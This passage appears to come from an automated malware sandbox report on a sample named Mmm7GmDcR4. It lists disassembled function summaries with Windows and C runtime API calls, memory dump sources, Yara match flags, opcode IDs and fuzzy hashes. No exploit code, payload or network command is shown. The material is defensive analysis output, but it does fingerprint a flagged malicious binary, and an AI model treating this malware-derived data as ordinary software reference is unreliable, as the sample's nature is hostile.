                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                • String ID: <(@
                                                                                                • API String ID: 3213686812-4189137628
                                                                                                • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                • Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
                                                                                                • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                                                                • Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424309
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                • String ID: pScheduler
                                                                                                • API String ID: 1381464787-923244539
                                                                                                • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                • Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
                                                                                                • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                                                                • Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D
                                                                                                APIs
                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E650
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID: pContext
                                                                                                • API String ID: 1990795212-2046700901
                                                                                                • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                • Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
                                                                                                • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                                                                • Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC
                                                                                                APIs
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                • String ID: pScheduler$version
                                                                                                • API String ID: 1687795959-3154422776
                                                                                                • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                • Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
                                                                                                • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                                                                • Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                • Instruction ID: d26ac56f160f9c0187621c34d3633f366a3b45542280af801358a43db6690ba2
                                                                                                • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                • Instruction Fuzzy Hash: 1FA1797298038ABFD725CF18C8987BEBBE7EF52310F5841ADD9959B281C3358951CB50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                • Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
                                                                                                • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                • Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                • Instruction ID: 22df813f4fd2abad44ace040afb5495e022ef8a66b2350f2a495c9b7ee415b0d
                                                                                                • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                • Instruction Fuzzy Hash: 40415C319C0114AFDB246FB8AC4CBBE3B66EF06770F140255F82AD7690D73265228AA1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                • Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
                                                                                                • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                • Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0216046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02166B41
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02166BCA
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02166BDC
                                                                                                • __freea.LIBCMT ref: 02166BE5
                                                                                                  • Part of subcall function 021638FE: RtlAllocateHeap.NTDLL(00000000,0213DACD,00000000), ref: 02163930
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                • String ID:
                                                                                                • API String ID: 2652629310-0
                                                                                                • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                • Instruction ID: 0c2540d9c1a94fee5cf52b87d3fa3919aa9170652573dc5607c2946178a4a540
                                                                                                • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                                                                • Instruction Fuzzy Hash: 8031CF72A4025AEFDF258F64CC88DBE7BA9EF40714F094269EC14D7190EB39D960CB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                • String ID:
                                                                                                • API String ID: 531285432-0
                                                                                                • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                • Instruction ID: 71b60b494e5def044e9489f4f8b478db5b8c4b500e38938c44c6dc9a4463c333
                                                                                                • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                • Instruction Fuzzy Hash: 91215EB5E40209AFDF06EFA4DC819BEBBBAFF09710F100065E515A7250DB74AD028FA1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                • String ID:
                                                                                                • API String ID: 531285432-0
                                                                                                • Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                • Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
                                                                                                • Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
                                                                                                • Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,00000000), ref: 00423729
                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711
                                                                                                  • Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                • String ID:
                                                                                                • API String ID: 2630251706-0
                                                                                                • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                • Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
                                                                                                • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                                                                • Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698
                                                                                                APIs
                                                                                                • ShowWindow.USER32(00000005), ref: 00401FA5
                                                                                                • UpdateWindow.USER32 ref: 00401FAD
                                                                                                • ShowWindow.USER32(00000000), ref: 00401FC1
                                                                                                • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Show$MoveUpdate
                                                                                                • String ID:
                                                                                                • API String ID: 1339878773-0
                                                                                                • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                • Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
                                                                                                • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                • Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0215933A
                                                                                                  • Part of subcall function 02159287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021592B6
                                                                                                  • Part of subcall function 02159287: ___AdjustPointer.LIBCMT ref: 021592D1
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0215934F
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02159360
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 02159388
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction ID: c72988f5636e8cb72247b8ce054517fb04ab3b2a4c39495d550c01bd632d2552
                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction Fuzzy Hash: 93010572140158FBCF126EA5CC44EEB3BAEEF88754F054044FE2866120C332E8619BE1
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004290D3
                                                                                                  • Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
                                                                                                  • Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004290E8
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00429121
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                • Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0216512D,00000000,00000000,00000000,00000000,?,021653E5,00000006,0044A378), ref: 021651B8
                                                                                                • GetLastError.KERNEL32(?,0216512D,00000000,00000000,00000000,00000000,?,021653E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02162203), ref: 021651C4
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0216512D,00000000,00000000,00000000,00000000,?,021653E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021651D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction ID: 23862d1d56438a2deb72aa6eade9311675563ffc3a838e2c421d7eeb4898925a
                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction Fuzzy Hash: 7B01F736691323BBC7214F699C48A7EB7D9AF06FA27610630F906D7140C720DA11CAE4
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
                                                                                                • GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                • Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0215639F
                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021563B3
                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021563CB
                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021563E3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                • String ID:
                                                                                                • API String ID: 78362717-0
                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction ID: 8595bc8f572c1d1aa3715517ecb86bf8236d137f36d4787cd25d4f4459c45d80
                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction Fuzzy Hash: 8C01D632640534EBDF55AE59D840EAF77AE9F95750F410095EC39A7281DBB0ED108AE0
                                                                                                APIs
                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 02152BA1
                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02152BBF
                                                                                                  • Part of subcall function 02148677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02148698
                                                                                                  • Part of subcall function 02148677: Hash.LIBCMT ref: 021486D8
                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02152BC8
                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02152BE8
                                                                                                  • Part of subcall function 0214F6CF: Hash.LIBCMT ref: 0214F6E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                • String ID:
                                                                                                • API String ID: 2250070497-0
                                                                                                • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                • Instruction ID: c3b42fde7d7446ec38ad5c09d249c3f9fc526d0c235269e95d2aa0fc90db4785
                                                                                                • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                • Instruction Fuzzy Hash: 86118E77800600EFC715DFA4C880EDAF7B9AF19310F008A5EE96A87551DB70E904CBA0
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                • String ID:
                                                                                                • API String ID: 78362717-0
                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                • Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8
                                                                                                APIs
                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 02152BA1
                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02152BBF
                                                                                                  • Part of subcall function 02148677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02148698
                                                                                                  • Part of subcall function 02148677: Hash.LIBCMT ref: 021486D8
                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02152BC8
                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02152BE8
                                                                                                  • Part of subcall function 0214F6CF: Hash.LIBCMT ref: 0214F6E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                • String ID:
                                                                                                • API String ID: 2250070497-0
                                                                                                • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                • Instruction ID: 403c894809ec44028a36dedda9d3d3d1598c715418963ea965cb032ba513e760
                                                                                                • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                • Instruction Fuzzy Hash: 13012976440604AFC725EFA5C881EDAF7F9AF58310F008A1EE96A87650DB70F944CFA0
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 021350C7
                                                                                                  • Part of subcall function 0213BDA4: __EH_prolog3_GS.LIBCMT ref: 0213BDAB
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02135112
                                                                                                • __Getcoll.LIBCPMT ref: 02135121
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02135131
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID:
                                                                                                • API String ID: 1836011271-0
                                                                                                • Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                • Instruction ID: 8a0aee5d131514966f5c8a6640ae5267ba367f96c3d6e0d77d157461b69e7703
                                                                                                • Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
                                                                                                • Instruction Fuzzy Hash: 05019E31D80308EFDB16EFA4C450B9CBBB3BF48724F10812AD045AB241CB799544CF91
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 02135B83
                                                                                                  • Part of subcall function 0213BDA4: __EH_prolog3_GS.LIBCMT ref: 0213BDAB
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02135BCE
                                                                                                • __Getcoll.LIBCPMT ref: 02135BDD
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02135BED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID:
                                                                                                • API String ID: 1836011271-0
                                                                                                • Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                                                • Instruction ID: 6c43aa44546a568ab53d34c2403d91a1ec48a699d9054d1263c61a0374be7104
                                                                                                • Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
